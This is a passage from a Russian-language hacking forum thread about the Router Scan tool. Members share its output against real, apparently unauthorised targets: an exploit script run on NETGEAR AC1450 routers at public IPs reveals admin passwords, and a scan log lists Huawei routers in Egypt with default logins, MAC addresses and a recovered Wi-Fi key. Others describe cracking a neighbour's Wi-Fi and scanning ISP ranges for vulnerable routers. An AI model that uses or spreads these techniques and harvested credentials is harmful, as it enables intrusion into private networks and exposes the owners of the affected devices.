прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    322
    Likes Received:
    131
    Reputations:
    3
    Роутерскан тоже не первый год развивается, а он фришный)
     
    sha9 likes this.
  2. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    562
    Likes Received:
    733
    Reputations:
    2
    так то свои пацаны. правильные.наши. а то буржуины.они за так и кружку воды не дадут :D
     
  3. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    607
    Likes Received:
    3,643
    Reputations:
    170
  4. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    322
    Likes Received:
    131
    Reputations:
    3
    Нет, причина в другом (моих предсказываний)... Просто эксплоиты для роутеров не пользуются спросом, как например на винду, из-за этого кому-то покупать его нету смысла..
     
  5. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,533
    Likes Received:
    9,510
    Reputations:
    118
  6. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    607
    Likes Received:
    3,643
    Reputations:
    170
    Не знаю, надо посмотреть повнимательнее. На том, что я пробовал - нет.
    Code:
    # python netgore.py 73.237.21.160 844З
    Attcking: NETGEAR AC1450
    token found: 1160125963
    user: admin
    pass: cl0s3out
    Здесь не срабатывает:
    Code:
    # python netgore.py 73.72.235.214 844З
    Attcking: NETGEAR AC1450
    token found: 0
    not vulnerable becuse password recovery IS set
    
     
    CRACK211, to.Index, Payer and 4 others like this.
  7. uyl05409

    uyl05409 New Member

    Joined:
    9 Feb 2017
    Messages:
    10
    Likes Received:
    1
    Reputations:
    0
    ребятушки мои золотые. бяда пришла откуда не ждали. из Египта. а точнее из тевой хучи роутеров Huawei EchoLife HG532n и Huawei EchoLife HG531 V1 произведёных Китае и установленных в Египте.
    подробнее далее в выпуске:
    при сканировании весма удачно подбирается пароль и логин на админку, но пароль на точку не получается. пишет "<not accessible>"
    спасайте )

    41.32.34.129 80 156 Done user:user Huawei EchoLife HG532n 88:E3:AB:E5:BF:90 MaKaNe WPA <not accessible> 34259283
    41.32.34.193 80 156 Done admin:admin Huawei EchoLife HG531 V1 F4:E3:FB:D3:71:60 Arex WPA2 <not accessible> 38571169
     
    #2827 uyl05409, 9 Feb 2017
    Last edited: 9 Feb 2017
  8. pro100boy

    pro100boy Well-Known Member

    Joined:
    20 Jun 2015
    Messages:
    152
    Likes Received:
    336
    Reputations:
    1
    41.32.34.193 80 125 Done admin:admin Huawei EchoLife HG531 V1 F4:E3:FB:D3:71:53 Arex WPA2 Psd.Arex 38571169
     
  9. Triton_Mgn

    Triton_Mgn Well-Known Member

    Joined:
    6 Jul 2015
    Messages:
    3,531
    Likes Received:
    5,313
    Reputations:
    50
    Вручную вытащил?
     
  10. pro100boy

    pro100boy Well-Known Member

    Joined:
    20 Jun 2015
    Messages:
    152
    Likes Received:
    336
    Reputations:
    1
    Лог Роутер скана
     
  11. systeman

    systeman New Member

    Joined:
    2 Dec 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Привет всем.
    Указываю диапазон:
    62.183.0.0-62.183.127.255
    А он автоматом пишет:
    62.183.0.0/17
    Почему так и как быть? Он не находит вайфай точки, которые видны с моего бука или смарта.
    WTF?
     
    #2831 systeman, 9 Feb 2017
    Last edited: 9 Feb 2017
  12. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    322
    Likes Received:
    131
    Reputations:
    3
    Это норма (CIDR, вроде).
    Беcклассовая адресация (Classless InterDomain Routing, англ. CIDR) - метод IP-адресации, позволяющий гибко управлять пространством IP-адресов, не используя жёсткие рамки классовой адресации. Использование этого метода позволяет экономно использовать конечный ресурс IP-адресов.
    На работу это не должно влиять,а размер диапазонов уменьшает (переводит их в краткую форму)
    А вот тут подробнее... Точно все те роутеры сидят на том диапазоне и они не за натом? Может пароли не дефолтные, а прошивки без уязвимостей, которые в базе роутер скана?
    Или ты что-то другое подумал о работе софта ТК сравнить результат работы роутер скана и что нашёл мак бук немного странноo_O
     
  13. systeman

    systeman New Member

    Joined:
    2 Dec 2016
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Рассказываю: живу в 5ти этаже, по подъезду на каждом этаже стоят коробки ростелекома, от них идёт кабель в квартиру. Я так думаю что провайдер 100% тот же что и у меня, и ip думаю с тем же диапазоном. Но судя по скану роутерскана, видимо все же ИП в другом диапазоне, а там хз. Мак адрес роутера я вижу а вот ИП нет.
     
  14. Ossen

    Ossen Active Member

    Joined:
    4 Jun 2015
    Messages:
    229
    Likes Received:
    155
    Reputations:
    0
    Единственно могут быть на разных регионах я роутер соседа выцепил аж на Мурманском диапазоне ростелекома и ещё одна плохая штука Ростелеком во многих регионах в настройках оборудования по умолчанию ставит закрытым внешний доступ
     
  15. carartem02

    carartem02 Active Member

    Joined:
    8 Nov 2015
    Messages:
    322
    Likes Received:
    131
    Reputations:
    3
    Рассказываю: живу на 8 этаже, около меня есть 1 точка (сигнал не очень, на черный день сойдет), так вот... Подобрал пароль, подключился, смотрю, а там ип как у меня (мой 12.23.11.95, а у него 12.23.11.83) ну и провайдер тоже как у меня... А вот запускаю роутер скан на этот ип (нахожусь в этом же диапазоне) - не находит там роутер. Походу совсем закрыт, даже от своих соседей :(
     
  16. stasstv

    stasstv Member

    Joined:
    26 Oct 2016
    Messages:
    27
    Likes Received:
    18
    Reputations:
    0
    Подключитесь к этой точке, посмотрите какой адрес шлюза Вам дал DHCP, после пробуйте попасть на маршрутизатор по этому адресу и смотрите настройки, взможно там и найдёте ответ на свой вопрос.
     
  17. Ossen

    Ossen Active Member

    Joined:
    4 Jun 2015
    Messages:
    229
    Likes Received:
    155
    Reputations:
    0
    гораздо проще отключить для эксперимента на той точке брандмауэр в настройках и RS её увидит
     
  18. pwr2

    pwr2 Member

    Joined:
    1 Oct 2013
    Messages:
    105
    Likes Received:
    45
    Reputations:
    6
    Опять локация по BSSID забанена?
     
  19. Permyak

    Permyak New Member

    Joined:
    3 Feb 2017
    Messages:
    1
    Likes Received:
    2
    Reputations:
    0
    Истёк срок домена 3вифи... база с роут скан не выгружается. Есть зеркала ?
     
    carartem02 and Triton_Mgn like this.
  20. Triton_Mgn

    Triton_Mgn Well-Known Member

    Joined:
    6 Jul 2015
    Messages:
    3,531
    Likes Received:
    5,313
    Reputations:
    50
    3wifi.tk но надо подождать binarymaster , думаю он подскажет что нам делать.
     
    sha9 and carartem02 like this.
Loading...